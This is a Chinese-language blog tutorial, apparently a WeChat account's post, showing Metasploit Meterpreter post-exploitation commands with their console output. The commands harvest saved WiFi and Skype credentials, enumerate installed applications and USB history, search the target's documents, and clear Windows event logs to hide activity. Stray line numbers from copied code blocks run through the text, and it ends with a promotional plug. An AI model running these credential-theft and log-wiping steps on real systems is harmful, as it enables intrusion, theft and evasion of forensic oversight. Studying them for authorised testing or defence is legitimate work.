# Metasploit其他后渗透模块
# 收集无线SSID信息
run post/windows/wlan/wlan_bss_list
meterpreter > run post/windows/wlan/wlan_bss_list
1
2
2
# 收集无线Wifi密码
run post/windows/wlan/wlan_profile
1
可以收集目标系统上保存的Wifi登录凭证。
meterpreter > run post/windows/wlan/wlan_profile
1
# 获取应用程序列表
run get_application_list
meterpreter > run get_application_list
[!] Meterpreter scripts are deprecated. Try post/windows/gather/enum_applications.
[!] Example: run post/windows/gather/enum_applications OPTION=value [...]
Installed Applications
======================
Name Version
---- -------
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148
Radmin Server 3.5 3.50.0000
WebFldrs XP 9.50.7523
meterpreter >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# 获取Skype密码
run post/windows/gather/credentials/skype
meterpreter > run post/windows/gather/credentials/skype
1
2
3
2
3
# 获取USB使用历史信息
run post/windows/gather/usb_history
meterpreter > run post/windows/gather/usb_history
[*] Running module against LIUYAZHUANG
[*]
D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
E: Disk 31ac31ab
[-] No USB devices appear to have been connected to this host.
meterpreter >
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
利用这个模块可以轻松的伪造USB描述符合硬件ID
# 查找文件
meterpreter > search -f *.doc
Found 6 results...
c:\Documents and Settings\Default User\Templates\winword.doc (4608 bytes)
c:\Documents and Settings\Default User\Templates\winword2.doc (1769 bytes)
c:\Documents and Settings\lyz\Templates\winword.doc (4608 bytes)
c:\Documents and Settings\lyz\Templates\winword2.doc (1769 bytes)
c:\WINDOWS\system32\config\systemprofile\Templates\winword.doc (4608 bytes)
c:\WINDOWS\system32\config\systemprofile\Templates\winword2.doc (1769 bytes)
meterpreter >
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
# 清除目标系统上的日志
clearev
meterpreter > clearev
[*] Wiping 190 records from Application...
[*] Wiping 286 records from System...
1
2
3
4
5
2
3
4
5
另一个用来处理日志的模块就是event_manager
meterpreter > run event_manager
Meterpreter Script for Windows Event Log Query and Clear.
OPTIONS:
-c <opt> Clear a given Event Log (or ALL if no argument specified)
-f <opt> Event ID to filter events on
-h Help menu
-i Show information about Event Logs on the System and their configuration
-l <opt> List a given Event Log.
-p Supress printing filtered logs to screen
-s <opt> Save logs to local CSV file, optionally specify alternate folder in which to save logs
meterpreter >
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration
Event Logs on System
====================
Name Retention Maximum Size Records
---- --------- ------------ -------
Application Disabled 524288K 0
Security Disabled 524288K Access Denied
System Disabled 524288K 0
ThinPrint Diagnostics Disabled K 1
meterpreter > run event_manager -c
[-] You must specify and eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] Security:
[*] Clearing Security
[-] Failed to Clear Security, Access Denied
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
[*] ThinPrint Diagnostics:
[*] Clearing ThinPrint Diagnostics
[*] Event Log ThinPrint Diagnostics Cleared!
meterpreter >
meterpreter >
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration
Event Logs on System
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!